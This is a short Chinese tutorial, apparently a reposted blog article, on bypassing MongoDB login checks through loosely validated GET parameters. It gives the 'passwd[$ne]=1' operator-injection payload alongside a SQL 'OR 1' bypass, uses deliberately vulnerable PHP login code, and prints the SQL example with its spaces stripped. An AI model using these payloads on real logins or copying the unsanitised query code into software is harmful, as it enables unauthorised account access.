本篇文章给大家分享的是有关怎样利用GET参数判断不严格进行mongoDB注入,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。 在关系型数据库时
本篇文章给大家分享的是有关怎样利用GET参数判断不严格进行mongoDB注入,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。
在关系型数据库时代,sql注入攻防几乎成了每一个web开发者的必修课,很多NoSQL的支持者称NoSQL的同时也就NoSQL注入了。
怎样利用GET参数判断不严格进行MonGoDB注入
使用SQL数据库存储用户名密码的系统,我们检测用户名与密码的过程可能是这样的:
Mysql_query("SELECT*FROMuser
WHEREusername=".$_GET['username'].",
ANDpasswd=".$_GET['passwd'])
我们使用MongoDB进行最简单的用户名与密码检测可能是这样的:
$collection->find(array(
"username"=>$_GET['username'],
"passwd"=>$_GET['passwd']
));
怎样利用GET参数判断不严格进行MongoDB注入
在最普通的SQL注入中,我们可以构造下面这样的请求:
login.PHP?username=admin&passwd=abcOR1–
这个请求会形成这样的SQL语句:
SELECT*FROMuserWHEREusername=adminANDpasswd=abcOR1;
成功注入!
采用同理的方法,针对上面的MongoDB查询方式,你可以构造下面的请求:
login.php?username=admin&passwd[$ne]=1
这个请求会形成这样的MongoDB查询:
$collection->find(array(
"username"=>"admin",
"passwd"=>array("$ne"=>1)
));
成功注入!
以上就是怎样利用GET参数判断不严格进行MongoDB注入,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注编程网数据库频道。
--结束END--
本文标题: 怎样利用GET参数判断不严格进行MongoDB注入
本文链接: https://www.lsjlt.com/news/61363.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
下载Word文档到电脑,方便收藏和打印~
2024-05-10
2024-05-10
2024-05-10
2024-05-10
2024-05-10
2024-05-10
2024-05-09
2024-05-09
2024-05-09
2024-05-09
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0